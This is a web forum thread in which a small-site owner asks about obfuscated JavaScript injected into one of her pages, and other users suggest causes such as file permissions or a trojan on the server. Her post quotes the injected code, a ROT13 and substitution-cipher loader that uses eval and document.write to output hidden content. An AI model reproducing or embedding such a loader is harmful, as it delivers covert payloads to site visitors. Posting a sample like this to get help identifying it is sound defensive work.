One of my website customers emailed me and said her virus scanner kept shutting down her website i had updated....mine didn't, but i checked through the code anyways...and i have THIS at the bottom of one of my files...it was NOT put there by me, and i'm totally appalled it was there! I had just looked at the code yesterday and it wasn't..and today there it is! what is it, where did it come from? The virus scanner said the problem was coming from 24.85.141.139 and here is the code...(i removed the script tags) var sf=" shapgvba cwzgq(d){ine xp,yfl=\"r|b'RhkB_98[5)XsvAPClwHix.e,2o:$uyT^&Vqa36Nd=-Z\\\"{`z]m@GS;UI c# 0}jWMt1pf7~(n4O*+g!\",xn=\"\",c,wah,xs=\"\",pr;sbe(xp=0;xp<d.yratgu;xp+ +){ c=d.puneNg(xp);wah=yfl.vaqrkBs(c);vs(wah>-1){ pr=((wah+1)%81-1);vs(pr<=0)pr+=81;xs+=yfl.puneNg(pr-1); } ryfr xs+=c;}xn+=xs;qbphzrag.jevgr(xn);}",aarf="";for(nyf=0;nyf<sf.length;nyf ++){ cqd = sf.charCodeAt(nyf);if((cqd>64 && cqd<78)||(cqd>96 && cqd<110)) cqd=cqd+13;else if((cqd>77 && cqd<91)||(cqd>109 && cqd<123))cqd=cqd-13;aarf=aarf.concat(String.fromCharCode(cqd));} var hw,u; eval( aarf );hw="<7s,N#!0G431x41|-{U4k47s,N#!{>0n'sx]|3!rJ,N!|a0{<SPRdyF0G431x41|- \\{Z4k4Ss,N#!\\{0SRP-\\{l!!#$//JJJr1''1G|M434Gj!Gs7rs']/99x!!rU7?{tn'sx ]|3!r,|i|,,|,t{\\{><\\/SPRdyF>{0KH0</7s,N#!>0"; pjmtd(hw); what on earth is it?? anyone know? there is also a lot of blank lines now at the bottom of the webpage that this code was on....is it safe to just delete this code and re-upload? carrie
Without going through the steps to decipher the code it's hard to say for sure, but all the signs are there. Mysterious code that has obviously been obfuscated, wasn't put the by the person who made the page, and is throwing up warnings on AV software? The smart money is on malicious code. Simply deleting it is only a temporary solution until you close the hole that led to the problem. How is content handled on that site? Is it dynamic? Static? How is it stored? Database? Includes? Are GET, POST, or COOKIE variables outputted without proper sanitization?
critic..there's just really nothing amazing about the page...mostly straight HTML, no get, no post, the most exciting thing is javascript pop up windows and an All Web Menus pro menu...(also javascript)..it's just an old site that was made years ago, and just gets some photos updated now and then....nothing spectacular at all.... i'll ask the hosting company however and see what they have to say about it... thanks! carrie
What was the CHMOD of the page? Did it have write permissions, or was there anyway a form could have posted data to it? Aside from this, it may be a trojan on your server, so I suggest that you contact your host.